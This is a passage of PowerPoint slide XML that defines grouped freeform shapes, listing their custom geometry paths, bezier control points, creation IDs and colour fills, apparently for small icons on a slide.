                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{78FA41D5-B52E-494D-8419-5715720F8DA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191" y="2271"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1704" name="Freeform 199">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F9385A-AEF9-4666-9581-D56A5B559BB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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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05" name="Freeform 200">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA90C955-07AF-440F-9E28-3E3260B6892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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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06" name="Freeform 201">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951D0169-C73B-42CC-BDA0-DEAEB8665A9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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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696" name="Group 202">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B64D2F24-B8E1-4332-B051-077ABE908D5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973" y="2554"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1701" name="Freeform 203">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB27AF25-35DF-4BE3-BC70-9FF1FE8A3BE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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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02" name="Freeform 204">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A86332C-0206-45A9-8A64-2A25B20D6C0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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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03" name="Freeform 205">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39161080-63D1-4FF1-BF0E-46E000328EF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4" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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697" name="Group 206">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B467FD23-B5F3-4E9B-A1DD-D975A24A4E6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191" y="2499"/>
                      <a:ext cx="137" cy="174"/>
                      <a:chOff x="2343" y="728"/>
                      <a:chExt cx="569" cy="718"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:sp>
                    <p:nvSpPr>
                      <p:cNvPr id="1698" name="Freeform 207">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B28327B1-CD9E-4C76-86D5-9D9EFBAE619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3" y="728"/>
                        <a:ext cx="569" cy="180"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 569"/>
                          <a:gd name="T1" fmla="*/ 112 h 180"/>
                          <a:gd name="T2" fmla="*/ 422 w 569"/>
                          <a:gd name="T3" fmla="*/ 0 h 180"/>
                          <a:gd name="T4" fmla="*/ 569 w 569"/>
                          <a:gd name="T5" fmla="*/ 39 h 180"/>
                          <a:gd name="T6" fmla="*/ 49 w 569"/>
                          <a:gd name="T7" fmla="*/ 180 h 180"/>
                          <a:gd name="T8" fmla="*/ 0 w 569"/>
                          <a:gd name="T9" fmla="*/ 168 h 180"/>
                          <a:gd name="T10" fmla="*/ 0 w 569"/>
                          <a:gd name="T11" fmla="*/ 112 h 18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569" h="180">
                            <a:moveTo>
                              <a:pt x="0" y="112"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="422" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="569" y="39"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="49" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="168"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="112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99" name="Freeform 208">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CCB318C-FA6A-45F5-BFF6-3693C318FB4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92" y="767"/>
                        <a:ext cx="520" cy="679"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 453"/>
                          <a:gd name="T1" fmla="*/ 589 h 589"/>
                          <a:gd name="T2" fmla="*/ 0 w 453"/>
                          <a:gd name="T3" fmla="*/ 121 h 589"/>
                          <a:gd name="T4" fmla="*/ 453 w 453"/>
                          <a:gd name="T5" fmla="*/ 0 h 589"/>
                          <a:gd name="T6" fmla="*/ 453 w 453"/>
                          <a:gd name="T7" fmla="*/ 468 h 589"/>
                          <a:gd name="T8" fmla="*/ 0 w 453"/>
                          <a:gd name="T9" fmla="*/ 589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3" h="589">
                            <a:moveTo>
                              <a:pt x="0" y="589"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="121"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="0"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="453" y="468"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="0" y="589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00" name="Freeform 209">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20391591-D20E-4EAD-82EC-1C18666042C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344" y="896"/>
                        <a:ext cx="48" cy="550"/>
                      </a:xfrm>
                      <a:custGeom>
                        <a:avLst/>
                        <a:gdLst>
                          <a:gd name="T0" fmla="*/ 0 w 16"/>
                          <a:gd name="T1" fmla="*/ 0 h 183"/>
                          <a:gd name="T2" fmla="*/ 0 w 16"/>
                          <a:gd name="T3" fmla="*/ 180 h 183"/>
                          <a:gd name="T4" fmla="*/ 16 w 16"/>
                          <a:gd name="T5" fmla="*/ 183 h 183"/>
                          <a:gd name="T6" fmla="*/ 16 w 16"/>
                          <a:gd name="T7" fmla="*/ 3 h 183"/>
                          <a:gd name="T8" fmla="*/ 0 w 16"/>
                          <a:gd name="T9" fmla="*/ 0 h 18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6" h="183">
                            <a:moveTo>
                              <a:pt x="0" y="0"/>
                            </a:moveTo>
                            <a:lnTo>
                              <a:pt x="0" y="180"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="183"/>
                            </a:lnTo>
                            <a:lnTo>
                              <a:pt x="16" y="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660" name="Group 210">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE3EA47B-29A7-4509-B69C-44906645E6D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548" y="2848"/>
                  <a:ext cx="257" cy="202"/>
                  <a:chOff x="1315" y="1508"/>
                  <a:chExt cx="596" cy="469"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1679" name="Freeform 211">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3499C73E-1309-4FEC-8F24-35CBA98BD3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80" name="Freeform 212">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EB023E1-9BDD-4075-85EF-5AF16EC580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81" name="Freeform 213">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BCA4F29-0589-44F9-B74D-19DF62A3C4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315" y="1589"/>
                    <a:ext cx="297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661" name="Group 214">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46824A54-09D1-4A90-A241-2A8FCD198BE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084" y="2377"/>
                  <a:ext cx="317" cy="629"/>
                  <a:chOff x="1923" y="2441"/>
                  <a:chExt cx="317" cy="629"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="1670" name="Freeform 215">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD3D59E9-96F0-465D-9F9B-038159E9ED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069" y="2745"/>
                    <a:ext cx="120" cy="325"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 89 w 90"/>
                      <a:gd name="T1" fmla="*/ 156 h 245"/>
                      <a:gd name="T2" fmla="*/ 89 w 90"/>
                      <a:gd name="T3" fmla="*/ 7 h 245"/>
                      <a:gd name="T4" fmla="*/ 89 w 90"/>
                      <a:gd name="T5" fmla="*/ 5 h 245"/>
                      <a:gd name="T6" fmla="*/ 63 w 90"/>
                      <a:gd name="T7" fmla="*/ 20 h 245"/>
                      <a:gd name="T8" fmla="*/ 12 w 90"/>
                      <a:gd name="T9" fmla="*/ 10 h 245"/>
                      <a:gd name="T10" fmla="*/ 2 w 90"/>
                      <a:gd name="T11" fmla="*/ 0 h 245"/>
                      <a:gd name="T12" fmla="*/ 3 w 90"/>
                      <a:gd name="T13" fmla="*/ 36 h 245"/>
                      <a:gd name="T14" fmla="*/ 2 w 90"/>
                      <a:gd name="T15" fmla="*/ 205 h 245"/>
                      <a:gd name="T16" fmla="*/ 43 w 90"/>
                      <a:gd name="T17" fmla="*/ 205 h 245"/>
                      <a:gd name="T18" fmla="*/ 45 w 90"/>
                      <a:gd name="T19" fmla="*/ 51 h 245"/>
                      <a:gd name="T20" fmla="*/ 36 w 90"/>
                      <a:gd name="T21" fmla="*/ 40 h 245"/>
                      <a:gd name="T22" fmla="*/ 45 w 90"/>
                      <a:gd name="T23" fmla="*/ 51 h 245"/>
                      <a:gd name="T24" fmla="*/ 43 w 90"/>
                      <a:gd name="T25" fmla="*/ 205 h 245"/>
                      <a:gd name="T26" fmla="*/ 44 w 90"/>
                      <a:gd name="T27" fmla="*/ 211 h 245"/>
                      <a:gd name="T28" fmla="*/ 88 w 90"/>
                      <a:gd name="T29" fmla="*/ 218 h 245"/>
                      <a:gd name="T30" fmla="*/ 89 w 90"/>
                      <a:gd name="T31" fmla="*/ 156 h 2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90" h="245">
                        <a:moveTo>
                          <a:pt x="89" y="156"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="89" y="141"/>
                          <a:pt x="90" y="47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7" y="16"/>
                          <a:pt x="71" y="22"/>
                          <a:pt x="63" y="20"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="55" y="20"/>
                          <a:pt x="24" y="13"/>
                          <a:pt x="12" y="10"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="6" y="10"/>
                          <a:pt x="4" y="5"/>
                          <a:pt x="2" y="0"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="2" y="18"/>
                          <a:pt x="3" y="32"/>
                          <a:pt x="3" y="36"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="49"/>
                          <a:pt x="0" y="181"/>
                          <a:pt x="2" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="3" y="228"/>
                          <a:pt x="43" y="225"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="171"/>
                          <a:pt x="46" y="55"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="45" y="47"/>
                          <a:pt x="36" y="47"/>
                          <a:pt x="36" y="40"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="36" y="47"/>
                          <a:pt x="45" y="47"/>
                          <a:pt x="45" y="51"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="55"/>
                          <a:pt x="43" y="171"/>
                          <a:pt x="43" y="205"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="43" y="207"/>
                          <a:pt x="44" y="211"/>
                          <a:pt x="44" y="211"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="46" y="245"/>
                          <a:pt x="87" y="235"/>
                          <a:pt x="88" y="218"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="90" y="201"/>
                          <a:pt x="88" y="171"/>
                          <a:pt x="89" y="15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50000">
                        <a:schemeClr val="bg1">
                          <a:gamma/>
                          <a:shade val="85882"/>
                          <a:invGamma/>
                        </a:schemeClr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71" name="Freeform 216">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FB12649-9315-4E07-AF31-05E4954CC589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gray">
                  <a:xfrm>
                    <a:off x="1927" y="2527"/>
                    <a:ext cx="313" cy="258"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 235 w 236"/>
                      <a:gd name="T1" fmla="*/ 114 h 194"/>
                      <a:gd name="T2" fmla="*/ 235 w 236"/>
                      <a:gd name="T3" fmla="*/ 114 h 194"/>
                      <a:gd name="T4" fmla="*/ 225 w 236"/>
                      <a:gd name="T5" fmla="*/ 49 h 194"/>
                      <a:gd name="T6" fmla="*/ 199 w 236"/>
                      <a:gd name="T7" fmla="*/ 24 h 194"/>
                      <a:gd name="T8" fmla="*/ 156 w 236"/>
                      <a:gd name="T9" fmla="*/ 13 h 194"/>
                      <a:gd name="T10" fmla="*/ 116 w 236"/>
                      <a:gd name="T11" fmla="*/ 2 h 194"/>
                      <a:gd name="T12" fmla="*/ 86 w 236"/>
                      <a:gd name="T13" fmla="*/ 12 h 194"/>
                      <a:gd name="T14" fmla="*/ 73 w 236"/>
                      <a:gd name="T15" fmla="*/ 86 h 194"/>
                      <a:gd name="T16" fmla="*/ 73 w 236"/>
                      <a:gd name="T17" fmla="*/ 86 h 194"/>
                      <a:gd name="T18" fmla="*/ 72 w 236"/>
                      <a:gd name="T19" fmla="*/ 91 h 194"/>
                      <a:gd name="T20" fmla="*/ 21 w 236"/>
                      <a:gd name="T21" fmla="*/ 104 h 194"/>
                      <a:gd name="T22" fmla="*/ 26 w 236"/>
                      <a:gd name="T23" fmla="*/ 135 h 194"/>
                      <a:gd name="T24" fmla="*/ 80 w 236"/>
                      <a:gd name="T25" fmla="*/ 122 h 194"/>
                      <a:gd name="T26" fmla="*/ 80 w 236"/>
                      <a:gd name="T27" fmla="*/ 122 h 194"/>
                      <a:gd name="T28" fmla="*/ 86 w 236"/>
                      <a:gd name="T29" fmla="*/ 120 h 194"/>
                      <a:gd name="T30" fmla="*/ 99 w 236"/>
                      <a:gd name="T31" fmla="*/ 112 h 194"/>
                      <a:gd name="T32" fmla="*/ 104 w 236"/>
                      <a:gd name="T33" fmla="*/ 92 h 194"/>
                      <a:gd name="T34" fmla="*/ 104 w 236"/>
                      <a:gd name="T35" fmla="*/ 92 h 194"/>
                      <a:gd name="T36" fmla="*/ 110 w 236"/>
                      <a:gd name="T37" fmla="*/ 47 h 194"/>
                      <a:gd name="T38" fmla="*/ 109 w 236"/>
                      <a:gd name="T39" fmla="*/ 167 h 194"/>
                      <a:gd name="T40" fmla="*/ 118 w 236"/>
                      <a:gd name="T41" fmla="*/ 178 h 194"/>
                      <a:gd name="T42" fmla="*/ 169 w 236"/>
                      <a:gd name="T43" fmla="*/ 192 h 194"/>
                      <a:gd name="T44" fmla="*/ 196 w 236"/>
                      <a:gd name="T45" fmla="*/ 173 h 194"/>
                      <a:gd name="T46" fmla="*/ 196 w 236"/>
                      <a:gd name="T47" fmla="*/ 160 h 194"/>
                      <a:gd name="T48" fmla="*/ 216 w 236"/>
                      <a:gd name="T49" fmla="*/ 155 h 194"/>
                      <a:gd name="T50" fmla="*/ 219 w 236"/>
                      <a:gd name="T51" fmla="*/ 154 h 194"/>
                      <a:gd name="T52" fmla="*/ 232 w 236"/>
                      <a:gd name="T53" fmla="*/ 146 h 194"/>
                      <a:gd name="T54" fmla="*/ 236 w 236"/>
                      <a:gd name="T55" fmla="*/ 124 h 194"/>
                      <a:gd name="T56" fmla="*/ 235 w 236"/>
                      <a:gd name="T57" fmla="*/ 114 h 194"/>
                      <a:gd name="T58" fmla="*/ 192 w 236"/>
                      <a:gd name="T59" fmla="*/ 75 h 194"/>
                      <a:gd name="T60" fmla="*/ 194 w 236"/>
                      <a:gd name="T61" fmla="*/ 88 h 194"/>
                      <a:gd name="T62" fmla="*/ 200 w 236"/>
                      <a:gd name="T63" fmla="*/ 123 h 194"/>
                      <a:gd name="T64" fmla="*/ 196 w 236"/>
                      <a:gd name="T65" fmla="*/ 124 h 194"/>
                      <a:gd name="T66" fmla="*/ 194 w 236"/>
                      <a:gd name="T67" fmla="*/ 88 h 194"/>
                      <a:gd name="T68" fmla="*/ 192 w 236"/>
                      <a:gd name="T69" fmla="*/ 75 h 194"/>
                      <a:gd name="T70" fmla="*/ 192 w 236"/>
                      <a:gd name="T71" fmla="*/ 71 h 194"/>
                      <a:gd name="T72" fmla="*/ 192 w 236"/>
                      <a:gd name="T73" fmla="*/ 75 h 19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36" h="194">
                        <a:moveTo>
                          <a:pt x="235" y="114"/>
                        </a:moveTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="114"/>
                          <a:pt x="235" y="114"/>
                          <a:pt x="235" y="114"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="230" y="85"/>
                          <a:pt x="226" y="57"/>
                          <a:pt x="225" y="49"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="222" y="32"/>
                          <a:pt x="207" y="27"/>
                          <a:pt x="199" y="24"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="191" y="21"/>
                          <a:pt x="169" y="16"/>
                          <a:pt x="156" y="13"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="144" y="9"/>
                          <a:pt x="125" y="3"/>
                          <a:pt x="116" y="2"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="0"/>
                          <a:pt x="89" y="4"/>
                          <a:pt x="86" y="12"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="85" y="14"/>
                          <a:pt x="79" y="50"/>
                          <a:pt x="73" y="86"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="73" y="86"/>
                          <a:pt x="73" y="86"/>
                          <a:pt x="73" y="86"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="72" y="91"/>
                          <a:pt x="72" y="91"/>
                          <a:pt x="72" y="91"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="49" y="96"/>
                          <a:pt x="28" y="103"/>
                          <a:pt x="21" y="104"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="0" y="109"/>
                          <a:pt x="9" y="137"/>
                          <a:pt x="26" y="135"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="31" y="135"/>
                          <a:pt x="55" y="129"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                          <a:pt x="80" y="122"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                          <a:pt x="86" y="120"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="92" y="118"/>
                          <a:pt x="96" y="116"/>
                          <a:pt x="99" y="112"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="102" y="108"/>
                          <a:pt x="104" y="102"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                          <a:pt x="104" y="92"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="107" y="65"/>
                          <a:pt x="110" y="43"/>
                          <a:pt x="110" y="47"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="53"/>
                          <a:pt x="109" y="125"/>
                          <a:pt x="109" y="167"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="110" y="172"/>
                          <a:pt x="112" y="177"/>
                          <a:pt x="118" y="178"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="130" y="180"/>
                          <a:pt x="162" y="190"/>
                          <a:pt x="169" y="192"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="177" y="194"/>
                          <a:pt x="193" y="184"/>
                          <a:pt x="196" y="173"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="196" y="171"/>
                          <a:pt x="196" y="162"/>
                          <a:pt x="196" y="160"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="202" y="158"/>
                          <a:pt x="208" y="157"/>
                          <a:pt x="216" y="155"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="217" y="155"/>
                          <a:pt x="218" y="154"/>
                          <a:pt x="219" y="154"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="225" y="152"/>
                          <a:pt x="229" y="150"/>
                          <a:pt x="232" y="146"/>
                        </a:cubicBezTo>
                        <a:cubicBezTo>
                          <a:pt x="235" y="142"/>
